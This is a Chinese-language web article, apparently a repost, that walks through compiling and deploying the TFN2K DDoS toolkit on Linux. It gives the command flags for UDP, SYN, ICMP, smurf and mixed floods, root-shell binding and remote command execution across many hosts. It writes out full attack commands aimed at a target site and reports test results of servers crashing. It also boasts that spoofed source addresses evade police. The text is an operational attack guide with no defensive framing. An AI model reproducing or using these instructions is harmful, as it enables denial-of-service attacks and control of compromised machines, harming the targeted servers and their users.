服务器linux攻击方法,Linux操作系统中实现DDOS攻击的方法
来源:互联网
作者:小希
开始设置服务器:
解压 tar -zxvf tfn2k.tgz
1.安装TFN2K
TFN2K为开放原代码的软件,所以需要我们进行编译,这个不用说了,编译应该都会的吧,但有几个地方是必需注意的,因为使用不同版本和厂商的Linux需要不同的设置。
先修改src/ip.h
注释掉以下部分,否则编译出错。
/*struct in_addr{undefinedunsigned long int s_addr;}; */
然后make进行编译
编译时会提示你输入服务器端进行密码设置8-32位,(攻击的时候需要输入密码)编译后会出现两个新的执行文件td 和 tfn,其中td是守护进程,也是客户机的使用进程。而tfn是服务器控制进程,如果想攻击别人就必需先起动td这个进程,然后再运行服务器进程,否则攻 击无效,更改密码可以执行mkpass进行更改。最后在所有的客户机中安装并运行td(需要ROOT权限),并且在服务器上建立一个文本文件,文件中记录 所有的客户机IP地址(用VI编辑一个就可行了),格式为:
192.168.0.1
192.168.0.2
192.168.0.3
IP
IP
.....
然后在主服务器上运行./tfn
2.DDOS攻击实现
./tfn直接回车大家可以看到一些参数,英文好的朋友估计不用我来多讲了:)
格式./tfn
无用的参数我们不提,我们来说攻击用的
-f 这个参数后面跟刚才所写的文本文件名,就是真正实现DDOS攻击,而不是DOS
-h DOS攻击,也就是单机,一对一的攻击 后面跟一个主机或IP地址
-p 后面指定一个端口,不用说了
-c 最关键的参数,一共有11个选相
0 - 停止攻击,发善心用的
1 - 反欺骗等级设定 ,因为TFN这个工具在攻击的时候所发出的数据包是带有源地址的,但是源地址是随机的,也就是说地址不是你自给的,所以不用担心警察抓,哈哈
2 - 改编数据包的包尺寸:缺省的ICMP/8,smurf,udp攻击缺省使用最小包。你可以通过改变每个包的有效载荷的字节增加它的大小。
3 - 绑定root shell:启动一个会话服务,然后你连接一个指定端口就可以得到一个root shell。
4 - UDP洪水攻击:这个攻击是利用这样一个事实:每个udp包被送往一个关闭的端口,这样就会有一个ICMP不可到达的信息返回,增加了攻击的能力。
5 - SYN洪水攻击:这个攻击有规律的送虚假的连接请求。结果会是目标端口拒绝服务,添瞒TCP连接表,通过对不存在主机的TCP/RST响应增加攻击潜力,是标准的拒绝服务攻击.
6 - ICMP响应(ping)攻击:这个攻击发送虚假地址的ping请求,目标主机会回送相同大小的响应包。
7 - SMURF攻击:用目标主机的地址发送ping请求以广播扩大,这样目标主机将得到回复一个多倍的回复。
8 - MIX攻击:按照1:1:1的关系交替的发送udp,syn,icmp包,这样就可以对付路由器,其它包转发设备,NIDS,sniffers等,轮番轰炸:)
9 - TARGA3攻击
10 - 远程命令执行,这个参数是TFN的附加功能,其实TFN的攻击不仅仅是DOS,还可以远程的进行明令控制,如:
./tfn -f hostext -c 10 -i "mkdir /root/edison" 在所有的HOST上root家目录建立edison,-i后面跟"命令"
参数基本说完,下面攻击
./tfn -f hostext -c 4 -i www.xxx.com
使用hostext文件中记录的主机对163服务器进行UDP攻击(所有的主机中必需已经起动td进程)
./tfn -f hostext -c 5 -i www.xxx.com -p 80
使用hostext文件中记录的主机对163服务器进行TCP拒绝服务攻击(80攻击WEB,其他不用说了)
./tfn -f hostext -c 6 -i www.xxx.com
使用hostext文件中记录的主机对163服务器进行ICMP攻击(PING攻击,缓冲区溢出马上死机)
./tfn -f hostext -c 8 -i www.xxx.com
使用hostext文件中记录的主机对163服务器进行ICMP&TCP&UDP轮番攻击(如果对方是sniffer一定哭死)
./tfn -f hostext -c 0
让所由主机停止攻击
基本说完,最后说说我的测试结果
一对一攻击,攻击方式TCP 连接方式本地 本地CPU13% 被攻击的服务器CPU使用率70%以上,并时时波动
二对一攻击,攻击方式TCP 连接方式本地 本地单机CPU13% 被攻击的服务器CPU使用率100%
五对一攻击,攻击方式TCP 连接方式本地 本地单机CPU13% 被攻击的服务器死机.本人家里只有6台机器,但如果再多点,几十台机器,一般的个人服务器肯定要死掉了
一对一攻击,攻击方式ICMP 连接方式本地 本地CPU18% 被攻击的服务器CPU使用率96%以上,并时时波动二对一攻击,攻击方式ICMP 连接方式本地 本地单机CPU18% 被攻击的服务器以经无法上网,几乎无法使用,半小时内死机。
服务器linux攻击方法,Linux操作系统中实现DDOS攻击的方法相关推荐
- linux ddos攻击ip,Linux操作系统中实现DDOS攻击的方法
软件用的是最有名的DDOS,首先说我们用来攻击的客户机和服务器的配置方法,使用当下最有名的REDHATLinux进行测试,本次攻击测试我使用的是FEDORA CORE3. 开始设置服务器: 解压 ta ...
- linux a卡安装教程视频下载,在深度Deepin操作系统中安装AMD驱动的方法,附安装全过程...
以下为你介绍在深度Deepin操作系统中安装AMD驱动的方法,以选择Radeon Software for Linux Driver for Ubuntu 18.04.3(19.30版本)为例说明. ...
- html攻击代码,利用HTML5标签进行DDoS攻击的新方法揭秘
*严正声明:本文仅限于技术讨论与教育目的,严禁用于非法途径. 近期,来自Imperva Vitaly Simonovich和Dima Bekerman的安全研究专家发现了一种基于HTML5超链接审计功 ...
- 服务器光纤卡wwn信息,操作系统中查看HBA 光纤卡 WWN 号的方法汇总
操作系统中查看HBA 光纤卡 WWN 号的方法汇总 我们在日常的工作中经常需要查询HBA卡的WWN号,可是客户的HBA卡已经安装到服务器,且也没有交换机,在存储上看到很多WWN号,不知道主机对应的HB ...
- linux java获取路径_linux中java获取路径的方法
linux中java获取路径的方法 发布时间:2020-05-06 11:11:26 来源:亿速云 阅读:700 作者:小新 今天小编给大家分享的是linux中java获取路径的方法,相信很多人都不太 ...
- linux hba查看,各操作系统查看HBA和WWN的方法
1.Linux中使用Systool查看HBA信息 命令systool可以查看 [root@ABM-APP1 bin]# systool -c fc_host -v | more Class = &qu ...
- 深度linux系统任务栏毛玻璃,操作系统中常见的「毛玻璃」效果是怎么设计出来的?...
原标题:操作系统中常见的「毛玻璃」效果是怎么设计出来的? Matrix 首页推荐 Matrix 是少数派的写作社区,我们主张分享真实的产品体验,有实用价值的经验与思考.我们会不定期挑选 Matrix ...
- linux 显示隐藏文件_Mac Finder中显示和隐藏文件的方法
Mac Finder中显示和隐藏文件的方法 按照以下步骤查看Mac上Finder中的隐藏文件. 打开Finder窗口 现在在左栏中,点击 "设备 "下的Mac名称. 选择并点击启动 ...
- linux防火墙端口配置策略路由,Linux iptables防火墙详解 + 配置抗DDOS攻击策略实战...
Linux 内核中很早就实现了网络防火墙功能,在不同的Linux内核版本中,使用了不同的软件实现防火墙功能. 在2.0内核中,防火墙操作工具叫:ipfwadm 在2.2内核中,防火墙操作工具叫:ipc ...
- ddos攻击工具_简单有效的ddos攻击防御方法
做过网站的站长大多有被ddos攻击的经历,不少人面对竞争对手的网站就是直接雇人ddos攻击网站,导致对方网站长期打不开,最后无奈关闭网站,初尧今天就告诉大家一个最简单也是最有效的防御方法. 高防服务器 ...
最新文章
- 为什么现在的人越来越不幸福
- 最新2018年全球DevOps薪资报告:行业和团队选择指南
- [leetcode] 142.环形链表2
- python200行代码_如何用200行Python代码“换脸”
- 2012年4月18日 新的开始
- Linux 网卡驱动学习(九)(层二转发)
- 【论文写作】网上办公自动系统中功能需求如何写
- 《CUDA C编程权威指南》——2.4节设备管理
- CISCO 模拟器 Dynamips 使用说明
- 深度学习的视觉跟踪:一个全面的调查
- [转]富人的28个理财习惯
- c语言中求圆台体积公式,圆台体积公式_圆台体积计算公式(附计算器)
- 第一款在太空中使用的芯片
- ArcGIS系列(一):DEM数字高程模型数据的生成
- 说说你对 SPA 单页面的理解,它的优缺点分别是什么?
- mysql横切竖切_MySQL常用操作 - cheney-f的个人空间 - OSCHINA - 中文开源技术交流社区...
- 计算机配件仓库照片,配件仓库存管理技巧
- Android Studio不使用数据线调试adb
- Youtube2016推荐召回算法细节及最终实现(离线服务)——完整版
- ArrayList 集合底层实现原理解析